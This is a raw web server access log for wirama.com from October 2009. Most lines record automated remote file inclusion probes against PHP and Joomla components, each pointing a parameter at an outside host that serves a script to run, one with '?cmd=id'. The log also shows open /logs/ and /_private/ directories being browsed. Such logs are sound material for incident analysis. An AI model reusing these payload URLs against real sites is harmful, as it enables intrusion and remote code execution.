211.191.168.119 - - [04/Oct/2009:05:21:20 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:21:36 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.92.96.29 - - [04/Oct/2009:05:22:26 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:23:51 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:23:51 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:23:51 -0700] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:23:57 -0700] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:23:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:23:58 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:24:33 -0700] "GET /logs/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:24:33 -0700] "GET /ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:24:33 -0700] "GET /logs/access_090601.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.3.247.173 - - [04/Oct/2009:05:25:44 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.3.247.173 - - [04/Oct/2009:05:25:44 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
220.73.160.125 - - [04/Oct/2009:05:26:06 -0700] "GET /logs/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.73.160.125 - - [04/Oct/2009:05:26:06 -0700] "GET /ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.73.160.125 - - [04/Oct/2009:05:26:06 -0700] "GET /logs/access_090601.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:26:51 -0700] "GET /logs/access_090601.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:26:51 -0700] "GET /ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:26:51 -0700] "GET /logs/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:27:03 -0700] "GET /ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:27:03 -0700] "GET /logs/access_090601.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:27:03 -0700] "GET /logs/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:27:08 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:28:20 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.189.18.73 - - [04/Oct/2009:05:28:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:29:30 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [04/Oct/2009:05:29:42 -0700] "GET /logs/access_090401.log HTTP/1.0" 200 74403 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
220.73.160.125 - - [04/Oct/2009:05:29:58 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.191.168.119 - - [04/Oct/2009:05:30:11 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.smokin57.com/public_html//modules/Forums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.3.247.173 - - [04/Oct/2009:05:30:15 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.3.247.173 - - [04/Oct/2009:05:30:15 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
222.122.49.12 - - [04/Oct/2009:05:33:08 -0700] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://www.psgkorea.com/bbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.49.12 - - [04/Oct/2009:05:33:08 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.psgkorea.com/bbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.49.12 - - [04/Oct/2009:05:33:08 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.psgkorea.com/bbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.49.12 - - [04/Oct/2009:05:33:11 -0700] "GET /logs/access_090601.log//components/com_simpleboard/image_upload.php?sbp=http://www.psgkorea.com/bbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
96.31.77.221 - - [04/Oct/2009:05:35:16 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
96.31.77.221 - - [04/Oct/2009:05:35:16 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
96.31.77.221 - - [04/Oct/2009:05:35:16 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
96.31.77.221 - - [04/Oct/2009:05:35:28 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.135.134.109 - - [04/Oct/2009:05:40:12 -0700] "GET /logs/access_090601.log/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.109 - - [04/Oct/2009:05:40:12 -0700] "GET /ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.109 - - [04/Oct/2009:05:40:12 -0700] "GET /logs/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.109 - - [04/Oct/2009:05:47:33 -0700] "GET /logs/access_090801.log/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.111 - - [04/Oct/2009:05:54:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.111 - - [04/Oct/2009:05:55:49 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
208.80.193.42 - - [04/Oct/2009:05:56:33 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SU 2.010; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.wirama.com"
222.122.49.12 - - [04/Oct/2009:05:57:05 -0700] "GET /logs/access_090401.log//components/com_simpleboard/image_upload.php?sbp=http://www.psgkorea.com/bbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.57.31 - - [04/Oct/2009:06:02:24 -0700] "GET /logs/access_090801.log//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.57.31 - - [04/Oct/2009:06:02:24 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 3142 "-" "Mozilla/5.0" "wirama.com"
222.231.57.31 - - [04/Oct/2009:06:02:24 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
203.188.254.4 - - [04/Oct/2009:06:15:06 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "wirama.com"
203.188.254.4 - - [04/Oct/2009:06:15:17 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.medisite.fr/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "wirama.com"
72.30.78.215 - - [04/Oct/2009:06:17:47 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
222.231.57.31 - - [04/Oct/2009:06:36:59 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 3142 "-" "Mozilla/5.0" "wirama.com"
222.231.57.31 - - [04/Oct/2009:06:36:59 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
222.231.57.31 - - [04/Oct/2009:06:37:00 -0700] "GET /logs/access_090331.log//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.47 - - [04/Oct/2009:06:37:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [04/Oct/2009:06:37:38 -0700] "GET /logs/?N=A HTTP/1.1" 200 3137 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
93.87.105.95 - - [04/Oct/2009:07:23:45 -0700] "GET /logs/ HTTP/1.1" 200 3137 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14" "www.wirama.com"
93.87.105.95 - - [04/Oct/2009:07:23:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14" "www.wirama.com"
93.87.105.95 - - [04/Oct/2009:07:24:42 -0700] "GET /logs/access_091001.log HTTP/1.1" 200 4739848 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:28:54 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:28:55 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:28:58 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:28:59 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:29:04 -0700] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:29:06 -0700] "GET /_private/form_results.csv HTTP/1.1" 200 0 "http://www.wirama.com/_private/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:29:19 -0700] "GET /logs/ HTTP/1.1" 200 3137 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:29:34 -0700] "GET /tmp/ HTTP/1.1" 200 520 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:29:46 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.de/search?source=ig&hl=de&rlz=&=&q=wirama&btnG=Google-Suche&meta=lr%3D&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
188.97.233.13 - - [04/Oct/2009:07:29:55 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.de/search?source=ig&hl=de&rlz=&=&q=wirama&btnG=Google-Suche&meta=lr%3D&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
222.236.47.23 - - [04/Oct/2009:07:32:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:32:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:32:43 -0700] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:33:05 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:33:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:33:05 -0700] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:33:14 -0700] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:33:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:33:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:35:12 -0700] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:35:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:35:12 -0700] "GET /skin/zero_vote/error.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:35:33 -0700] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:35:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.23 - - [04/Oct/2009:07:35:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:36:36 -0700] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:58:48 -0700] "GET /login.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:58:48 -0700] "GET /logs/access_090331.log//login.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:58:48 -0700] "GET /logs//login.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [04/Oct/2009:07:59:00 -0700] "GET /logs/access_090601.log//login.php?dir=http://cr1zz.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [04/Oct/2009:08:04:32 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://buangsat.fileave.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [04/Oct/2009:08:04:33 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://buangsat.fileave.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [04/Oct/2009:08:04:34 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://buangsat.fileave.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.199.140.158 - - [04/Oct/2009:08:06:51 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://buangsat.fileave.com/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.11.145.8 - - [04/Oct/2009:08:33:08 -0700] "GET /bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.birdmobile.net/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [04/Oct/2009:08:33:08 -0700] "GET /logs//bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.birdmobile.net/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
123.125.66.103 - - [04/Oct/2009:08:39:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "wirama.com"
222.233.52.18 - - [04/Oct/2009:08:49:22 -0700] "GET /logs/bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.233.52.18 - - [04/Oct/2009:08:49:23 -0700] "GET /logs/access.log/bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.233.52.18 - - [04/Oct/2009:08:49:23 -0700] "GET /bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.219.245.149 - - [04/Oct/2009:08:53:58 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:08:53:58 -0700] "GET /logs/access_090801.log//components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:08:53:58 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:08:54:17 -0700] "GET /logs/access_090801.log//components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:08:54:17 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:08:54:17 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.233.52.18 - - [04/Oct/2009:08:55:40 -0700] "GET /logs/access.log/bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.233.52.18 - - [04/Oct/2009:08:55:40 -0700] "GET /bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.233.52.18 - - [04/Oct/2009:08:55:41 -0700] "GET /logs/bbs/skin/zae_plan/view_foot.php//write.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.13.229.128 - - [04/Oct/2009:09:00:09 -0700] "GET /logs/access_090401.log////////?mosConfig_absolute_path=http://www.incengine.org/incEngine/images/htmleditor/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.13.229.128 - - [04/Oct/2009:09:00:09 -0700] "GET ///////?mosConfig_absolute_path=http://www.incengine.org/incEngine/images/htmleditor/lol/mydb.txt?? HTTP/1.1" 200 921 "-" "Mozilla/5.0" "wirama.com"
69.13.229.128 - - [04/Oct/2009:09:00:09 -0700] "GET /logs////////?mosConfig_absolute_path=http://www.incengine.org/incEngine/images/htmleditor/lol/mydb.txt?? HTTP/1.1" 200 3148 "-" "Mozilla/5.0" "wirama.com"
65.55.207.138 - - [04/Oct/2009:09:03:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.207.138 - - [04/Oct/2009:09:12:48 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
114.4.8.14 - - [04/Oct/2009:09:18:59 -0700] "GET /logs//spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.melodiasdecoleccion.com/.idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
114.4.8.14 - - [04/Oct/2009:09:19:00 -0700] "GET /spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.melodiasdecoleccion.com/.idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
95.14.85.65 - - [04/Oct/2009:09:29:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bluepadma.com/56.txt?cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.wirama.com"
65.55.207.94 - - [04/Oct/2009:09:47:48 -0700] "GET /logs/?N=D HTTP/1.1" 200 3137 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
209.20.81.170 - - [04/Oct/2009:09:51:02 -0700] "HEAD / HTTP/1.0" 200 0 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)" "www.wirama.com"
